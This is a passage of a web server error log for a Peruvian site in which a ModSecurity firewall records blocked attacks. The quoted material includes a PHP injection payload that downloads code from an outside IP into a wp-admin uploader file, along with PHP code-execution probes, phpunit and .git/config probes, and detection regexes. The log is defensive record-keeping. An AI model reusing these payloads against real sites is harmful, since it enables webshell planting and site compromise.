03:34:20.398202 2023] [ssl:warn] [pid 3184:tid 140141074941824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 28 03:34:21.886238 2023] [ssl:warn] [pid 3184:tid 140141074941824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 28 03:34:24.106813 2023] [ssl:warn] [pid 3602:tid 140546188044160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 28 03:34:24.234064 2023] [ssl:warn] [pid 3603:tid 140546188044160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 28 15:01:30.264251 2023] [:error] [pid 3787:tid 140545884153600] [client 43.153.101.148:55806] [client 43.153.101.148] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZHOzGvrsZKpIUMZhqRr0JAAAAMY"], referer: www.google.com [Sun May 28 19:49:57.170227 2023] [autoindex:error] [pid 3787:tid 140545858975488] [client 43.134.136.145:41750] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon May 29 03:27:17.742374 2023] [ssl:warn] [pid 15864:tid 140363181188992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 29 03:27:17.883637 2023] [ssl:warn] [pid 15865:tid 140363181188992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 29 03:27:18.388959 2023] [ssl:warn] [pid 15865:tid 140363181188992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 29 03:27:19.970936 2023] [ssl:warn] [pid 15865:tid 140363181188992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 29 03:27:22.262692 2023] [ssl:warn] [pid 16499:tid 140361403578240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 29 03:27:22.399865 2023] [ssl:warn] [pid 16500:tid 140361403578240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 29 05:25:34.770691 2023] [:error] [pid 16527:tid 140361007560448] [client 199.195.253.105:36870] [client 199.195.253.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHR9nlVJHEBeOQzYtHjWnQAAAJE"] 2023/05/29 05:25:34 [error] 16477#16477: *85616 access forbidden by rule, client: 199.195.253.105, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon May 29 05:25:35.668468 2023] [:error] [pid 16945:tid 140361015953152] [client 199.195.253.105:36872] [client 199.195.253.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:content. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:content: <php>die(md5(cvbytigdfgfdg))</php>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZHR9n3YueMwB4xBeRDsTZQAAANA"] [Mon May 29 06:44:24.664955 2023] [:error] [pid 16945:tid 140361057916672] [client 199.195.253.105:40288] [client 199.195.253.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:?>"|utmccn. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZHSQGHYueMwB4xBeRDsVIAAAAMs"], referer: https://www.google.com/"<?=print(9347655345-4954366);?>" [Mon May 29 06:44:26.629675 2023] [:error] [pid 16527:tid 140361222956800] [client 199.195.253.105:40292] [client 199.195.253.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:?>'|utmccn. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZHSQGlVJHEBeOQzYtHjXnAAAAIA"], referer: https://www.google.com/'<?=print(9347655345-4954366);?>' [Mon May 29 06:44:28.671216 2023] [:error] [pid 16527:tid 140361057916672] [client 199.195.253.105:40300] [client 199.195.253.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS_NAMES:'{${print(9347655345-4954366)}}'. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: '{${print(9347655345-4954366) found within ARGS_NAMES:'{${print(9347655345-4954366)}}': '{${print(9347655345-4954366)}}'"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZHSQHFVJHEBeOQzYtHjXngAAAIs"], referer: https://www.google.com/'{${print(9347655345-4954366)}}' [Mon May 29 06:44:30.627538 2023] [:error] [pid 16525:tid 140360982382336] [client 199.195.253.105:40302] [client 199.195.253.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS_NAMES:"{${print(9347655345-4954366)}}". [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22{${print(9347655345-4954366) found within ARGS_NAMES:\\x22{${print(9347655345-4954366)}}\\x22: \\x22{${print(9347655345-4954366)}}\\x22"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZHSQHu1Hy9luyFeGl3q_igAAAFQ"], referer: https://www.google.com/"{${print(9347655345-4954366)}}" [Mon May 29 20:01:07.732890 2023] [autoindex:error] [pid 16945:tid 140361015953152] [client 43.153.221.244:46940] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 30 03:24:17.066332 2023] [ssl:warn] [pid 13143:tid 140378641401728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 30 03:24:17.251413 2023] [ssl:warn] [pid 13144:tid 140378641401728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 30 03:24:17.787184 2023] [ssl:warn] [pid 13144:tid 140378641401728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 30 03:24:19.811720 2023] [ssl:warn] [pid 13144:tid 140378641401728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 30 03:24:22.073284 2023] [ssl:warn] [pid 13565:tid 139910480185216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 30 03:24:22.208455 2023] [ssl:warn] [pid 13566:tid 139910480185216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 30 03:24:23.037765 2023] [ssl:warn] [pid 13566:tid 139910480185216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 30 15:31:28.183017 2023] [:error] [pid 13733:tid 139910027601664] [client 43.130.109.24:35750] [client 43.130.109.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZHZdIJRta0YGpkeVd6jUogAAAFg"], referer: www.google.com [Tue May 30 21:08:50.297045 2023] [autoindex:error] [pid 14001:tid 139910103136000] [client 43.134.84.109:48084] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 31 03:18:02.021283 2023] [ssl:warn] [pid 2024:tid 140023565244288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 31 03:18:02.185477 2023] [ssl:warn] [pid 2025:tid 140023565244288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 31 03:18:02.537145 2023] [ssl:warn] [pid 2025:tid 140023565244288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 31 03:18:04.043769 2023] [ssl:warn] [pid 2025:tid 140023565244288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 31 03:18:06.347630 2023] [ssl:warn] [pid 2444:tid 139675204814720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 31 03:18:06.499677 2023] [ssl:warn] [pid 2445:tid 139675204814720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 31 08:19:13.864287 2023] [:error] [pid 2462:tid 139674811033344] [client 43.130.109.2:39920] [client 43.130.109.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZHdJUVgond3OWvMDcJm0AAAAABE"], referer: www.google.com [Wed May 31 18:46:55.332326 2023] [:error] [pid 2462:tid 139674785855232] [client 43.159.138.6:54826] [client 43.159.138.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZHfcb1gond3OWvMDcJm5qgAAABQ"], referer: www.google.com [Thu Jun 01 03:24:00.698825 2023] [ssl:warn] [pid 31575:tid 139972554426240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 03:24:00.864724 2023] [ssl:warn] [pid 31576:tid 139972554426240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 03:24:01.274625 2023] [ssl:warn] [pid 31576:tid 139972554426240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 03:24:02.849378 2023] [ssl:warn] [pid 31576:tid 139972554426240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 03:24:05.202249 2023] [ssl:warn] [pid 32024:tid 140306385315712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 03:24:05.333360 2023] [ssl:warn] [pid 32025:tid 140306385315712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 07:05:53.681416 2023] [autoindex:error] [pid 32044:tid 140306112575232] [client 43.156.55.73:57026] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/06/01 14:00:46 [error] 31977#31977: *243770 access forbidden by rule, client: 45.61.186.104, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Jun 01 15:08:03.913247 2023] [autoindex:error] [pid 32042:tid 140306011862784] [client 43.156.204.173:49048] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jun 01 16:06:27.372200 2023] [ssl:warn] [pid 32025:tid 140306385315712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 16:42:39.067019 2023] [ssl:warn] [pid 32025:tid 140306385315712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 16:43:16.196750 2023] [ssl:warn] [pid 32025:tid 140306385315712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 16:46:40.622288 2023] [ssl:warn] [pid 32025:tid 140306385315712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jun 01 16:47:37.087875 2023] [ssl:warn] [pid 32025:tid 140306385315712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/06/02 01:47:54 [error] 31976#31976: *268278 access forbidden by rule, client: 79.120.76.144, server: investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "investigacionperu.com" [Fri Jun 02 02:12:27.107196 2023] [autoindex:error] [pid 23580:tid 140306196301568] [client 129.226.208.150:51564] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jun 02 03:45:19.825886 2023] [ssl:warn] [pid 15209:tid 139669439436672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jun 02 03:45:19.965448 2023] [ssl:warn] [pid 15210:tid 139669439436672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jun 02 03:45:20.339111 2023] [ssl:warn] [pid 15210:tid 139669439436672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jun 02 03:45:22.109395 2023] [ssl:warn] [pid 15210:tid 139669439436672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jun 02 03:45:24.353456 2023] [ssl:warn] [pid 15658:tid 139911430473600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jun 02 03:45:24.500699 2023] [ssl:warn] [pid 15659:tid 139911430473600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jun 02 08:35:32.593180 2023] [autoindex:error] [pid 15684:tid 139911109768960] [client 43.130.135.10:44356] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/06/02 08:57:30 [error] 15636#15636: *279759 access forbidden by rule, client: 209.141.57.231, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Fri Jun 02 16:01:15.932882 2023] [autoindex:error] [pid 15686:tid 139911025841920] [client 43.134.132.191:48878] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jun 02 16:37:46.130865 2023] [autoindex:error] [pid 15686:tid 139911009056512] [client 43.156.240.92:51078] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jun 02 16:48:14.010606 2023] [autoindex:error] [pid 16574:tid 139911084590848] [client 144.126.144.226:51666] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jun 02 18:46:18.293751 2023] [ssl:warn] [pid 15659:tid 139911430473600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jun 02 23:37:19.976769 2023] [:error] [pid 25176:tid 139911118161664] [client 154.6.12.10:51018] [client 154.6.12.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZHrDfx-YLEUyNfayk6PPLQAAAAc"] [Fri Jun 02 23:37:20.054581 2023] [:error] [pid 25178:tid 139911017449216] [client 154.6.12.10:51020] [client 154.6.12.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZHrDgOLFraKNyvRdsNBVGQAAAJM"] [Fri Jun 02 23:37:20.107665 2023] [:error] [pid 25177:tid 139911000663808] [client 154.6.12.10:51022] [client 154.6.12.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZHrDgHypP6mlhGqfZQ7ddQAAAFU"] [Fri Jun 02 23:37:21.182056 2023] [:error] [pid 25270:tid 139911076198144] [client 154.6.12.10:51024] [client 154.6.12.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/contacto/"] [unique_id "ZHrDgXQwbijrCUZXcJSLJgAAAMw"] [Fri Jun 02 